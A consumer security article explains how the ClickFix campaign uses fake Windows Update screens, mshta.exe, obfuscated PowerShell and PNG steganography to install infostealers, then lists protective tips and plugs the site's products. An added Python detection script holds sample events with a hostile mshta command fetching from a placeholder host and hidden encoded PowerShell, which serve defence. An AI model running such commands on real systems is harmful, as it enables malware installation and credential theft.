ClickFix campaign now uses fake Windows updates to spread malware
2025-12-13 18:30:11
Cybercriminals continue to get better at blending in with the software you use every day.
Over the past few years, we’ve seen phishing pages that copy banking portals, bogus browser alerts claiming your device is infected, and “human verification” screens that prompt you to execute commands you should never touch. The latest development comes from the ongoing ClickFix campaign.
Instead of asking you to prove that you are human, attackers now disguise the lure as a Windows Update. It looks convincing enough that you might follow the instructions without thinking, and that’s exactly what they want.
Sign up for my free CyberGuy report
Get the best tech tips, breaking security alerts, and exclusive deals delivered straight to your inbox. Plus, you’ll get instant access to my Ultimate Scam Survival Guide – for free when you join my site CYBERGUY.COM Newsletter.

The malware hides inside seemingly ordinary image files and uses steganography to bypass traditional security tools. (Microsoft)
How does the fake update work?
Researchers note that ClickFix has upgraded its old trick. The campaign used to rely on human verification pages, but now you get a full-screen Windows update screen that looks almost identical to the real thing. Joe Security demonstrated how the page displays fake progress bars, familiar update messages, and a prompt telling you to complete an important security update.
If you’re using Windows, the site asks you to open the Run box and paste something it has already placed on your clipboard. This “something” is a command that silently downloads the malware dropper. The final payload is usually an information stealer, which harvests passwords, cookies, and other data from your device.

Fake update screens are becoming harder to detect, as attackers mimic Windows with near-perfect accuracy. (security atmosphere)
The moment you paste the command, the infection chain starts. First, the built-in Windows utility mshta.exe reaches out to a remote server and fetches a script. To avoid detection, these URLs often hex-encode parts of the address and rotate their paths. The script then runs obfuscated PowerShell code padded with junk instructions to slow down researchers. Once PowerShell has done its job, it decrypts a hidden .NET assembly that acts as a loader.
Why is this attack so difficult to detect?
The loader hides its next step inside what looks like a regular PNG file. ClickFix uses custom steganography, a technique that hides data inside plain-looking content. In this case, the malware resides within the pixel data of the image. Attackers modify the color values of certain pixels, especially in the red channel, to carry pieces of shellcode. When you view the picture, everything looks normal.
The script knows exactly where the hidden data is located. It extracts the pixel values, decrypts them, and reconstructs the malware directly in memory. This means that nothing obvious is written to the disk. Security tools that rely on file scanning miss it, because the shellcode never appears as a standalone file.
Once rebuilt, the shellcode is injected into a trusted Windows process such as explorer.exe. The attack uses familiar in-memory techniques such as VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread. Recent ClickFix activity has delivered information stealers such as LummaC2 and updated versions of Rhadamanthys. These tools are designed to collect credentials and send them back to the attacker with little noise.
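The chain described above (explorer.exe launching mshta.exe with a remote URL, mshta.exe spawning obfuscated PowerShell, and a remote thread created in explorer.exe) is unusual enough to be written down as detection rules. The following Python is an added example for defenders, not code from the article or from any vendor mentioned in it; the Sysmon-style events it analyzes are constructed samples with placeholder hostnames, and the field names and rule names are assumptions made for this illustration.

```python
"""Toy detection rules for the ClickFix execution chain (added example).

Events mimic Sysmon Event ID 1 (process creation) and Event ID 8
(CreateRemoteThread). They are constructed for this illustration and are
not real telemetry; the hostname is a reserved placeholder.
"""
import re

# Constructed sample events (assumed field names, not a real log schema).
SAMPLE_EVENTS = [
    {"id": 1, "pid": 4120, "ppid": 900, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    # Run-box launch: mshta.exe fetching a script from a partly hex-encoded URL
    {"id": 1, "pid": 5200, "ppid": 4120, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://upd%61te.example.invalid/%73tage"},
    # Script host spawning hidden, encoded PowerShell (payload truncated)
    {"id": 1, "pid": 5304, "ppid": 5200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -ep bypass -enc SQBFAFgA..."},
    # Remote thread from PowerShell into the trusted shell process
    {"id": 8, "pid": 5304,
     "source_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target_image": r"C:\Windows\explorer.exe", "target_pid": 4120},
    # Benign noise: a document opened from the desktop
    {"id": 1, "pid": 6000, "ppid": 4120,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": '"WINWORD.EXE" report.docx'},
]

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
# A literal scheme, or percent / \x hex escapes used to disguise the address.
URL_RE = re.compile(r"https?://|%[0-9a-f]{2}|\\x[0-9a-f]{2}", re.I)
# Flags commonly combined to hide and obfuscate PowerShell execution.
PS_FLAGS_RE = re.compile(
    r"(?:^|\s)-(?:nop|noprofile|w(?:indowstyle)?\s+hidden"
    r"|e(?:nc|ncodedcommand)?\s|ep\s+bypass)", re.I)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def lineage(procs, pid, limit=16):
    """Walk the parent chain from root to pid, returning image names."""
    chain, seen = [], set()
    while pid in procs and pid not in seen and len(chain) < limit:
        seen.add(pid)
        chain.append(basename(procs[pid]["image"]))
        pid = procs[pid]["ppid"]
    return list(reversed(chain))


def analyze(events):
    """Return (pid, rule_name) findings for suspicious ClickFix-like activity."""
    procs = {e["pid"]: e for e in events if e["id"] == 1}
    findings = []
    for e in events:
        if e["id"] == 1:
            name = basename(e["image"])
            parent = procs.get(e["ppid"])
            parent_name = basename(parent["image"]) if parent else ""
            if name in SCRIPT_HOSTS and URL_RE.search(e["cmdline"]):
                findings.append((e["pid"], "script_host_remote_url"))
            if name == "powershell.exe" and parent_name in SCRIPT_HOSTS:
                findings.append((e["pid"], "powershell_from_script_host"))
            if name == "powershell.exe" and len(PS_FLAGS_RE.findall(e["cmdline"])) >= 2:
                findings.append((e["pid"], "powershell_evasion_flags"))
        elif e["id"] == 8:
            if (basename(e["source_image"]) == "powershell.exe"
                    and basename(e["target_image"]) == "explorer.exe"):
                findings.append((e["pid"], "remote_thread_into_explorer"))
    return findings


def full_chain_pids(events):
    """PIDs of PowerShell processes whose ancestry is explorer -> mshta -> powershell."""
    procs = {e["pid"]: e for e in events if e["id"] == 1}
    return [pid for pid in procs
            if lineage(procs, pid)[-3:] == ["explorer.exe", "mshta.exe", "powershell.exe"]]


if __name__ == "__main__":
    for pid, rule in analyze(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
    print("full ClickFix chain seen for pids:", full_chain_pids(SAMPLE_EVENTS))
```

Each rule on its own would be noisy in a large fleet (administrators do run hidden PowerShell), which is why the parent-chain check in `full_chain_pids` is the one worth alerting on: a user-facing shell process starting mshta.exe with a URL, which then starts PowerShell, is the Run-box pattern the article describes and has few legitimate explanations.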

Once the hidden code is loaded into a trusted Windows process, information stealers quietly begin collecting your data. (Kurt “CyberGuy” Knutsson)
7 steps you can take to protect yourself from a ClickFix campaign
The best way to stay protected is to slow down for a moment and follow some steps that prevent these attacks before they start.
1) Never run commands you did not request
If any site asks you to paste a command into Run, PowerShell, or Terminal, treat it as an immediate warning sign. Genuine operating system updates never require you to run commands from a web page. Running such a command hands control to the attacker. If anything feels off, close the page and do not interact with it further.
2) Keep Windows updates inside Windows
Updates should only come from the Windows Settings app or through official system notifications. A browser tab or pop-up pretending to be a Windows update is almost always fake. If you see anything outside of the normal update path asking you to take action, ignore it and check the real Windows Update page yourself.
3) Use a reputable antivirus program
Choose a security suite that can detect both file-based and memory-based threats. Stealthy attacks like ClickFix avoid leaving obvious files for scanners to pick up. Tools with behavioral detection, sandboxing, and script monitoring give you a much better chance of catching unusual activity early.
The best way to protect yourself from malicious links that install malware, and potentially access your private information, is to install strong antivirus software on all your devices. This protection can also alert you to phishing emails and ransomware, keeping your personal information and digital assets safe.
Get my picks for the best antivirus protection winners of 2025 for Windows, Mac, Android, and iOS at Cyberguy.com.
4) Use a password manager
Password managers create strong, unique passwords for each account you use. They also autofill only on legitimate websites, which helps you spot fake login pages. If your password manager refuses to fill in your credentials, take a second look at the URL before entering anything manually.
Next, check whether your email has been exposed in past breaches. Our #1 choice of password manager includes a built-in breach scanner that checks if your email address or passwords have appeared in known leaks. If you discover a match, immediately change any reused passwords and secure those accounts with new, unique credentials.
Check out the best expert-reviewed password managers of 2025 at Cyberguy.com.
5) Use a personal data removal service
Many attacks begin by targeting emails and personal details that have already been exposed online. Data removal services help reduce your digital footprint by requesting removals from data broker sites that collect and sell your information. They can’t erase everything, but reducing your exposure means fewer attackers can easily access your data.
While no service can guarantee complete removal of your data from the Internet, a data removal service is truly a smart choice. It’s not cheap, and neither is your privacy. These services do all the work for you by systematically monitoring and scraping your personal information from hundreds of websites. This gives me peace of mind and has proven to be the most effective way to clear your personal data from the Internet. By limiting the information available, you reduce the risk of fraudsters cross-referencing data from breaches to information they might find on the dark web, making it harder for them to target you.
Check out my top picks for data removal services and get a free check to see if your personal information is already on the web by visiting Cyberguy.com.
6) Check URLs before trusting anything
Compelling design does not mean it is legitimate. Always look at the domain name first. If it doesn’t match the official site or uses strange spelling or extra characters, close it. Attackers rely on the fact that people recognize the page design but ignore the address bar.
7) Close suspicious full-screen pages
Fake update pages often run in full screen mode to hide the browser interface and make the page look like it’s part of your computer. If the site suddenly goes full screen without your permission, exit using Esc or Alt+Tab. Once you exit, scan your system and do not return to that page.
Kurt’s key takeaway
ClickFix works because it depends on user interaction. Nothing happens unless you follow the on-screen instructions. This makes the fake Windows Update page particularly dangerous, because it exploits something most people trust. If you are accustomed to Windows updates taking over your screen, you may not question a prompt that appears during the process. Cybercriminals know this. They copy trusted interfaces to lower your guard and then rely on you to run the final command. The technical tricks that follow are complex, but the starting point is simple. They need you to help them.
Have you ever copied commands from a website without thinking twice about what they are doing? Let us know by writing to us at Cyberguy.com.
Copyright 2025 CyberGuy.com. All rights reserved.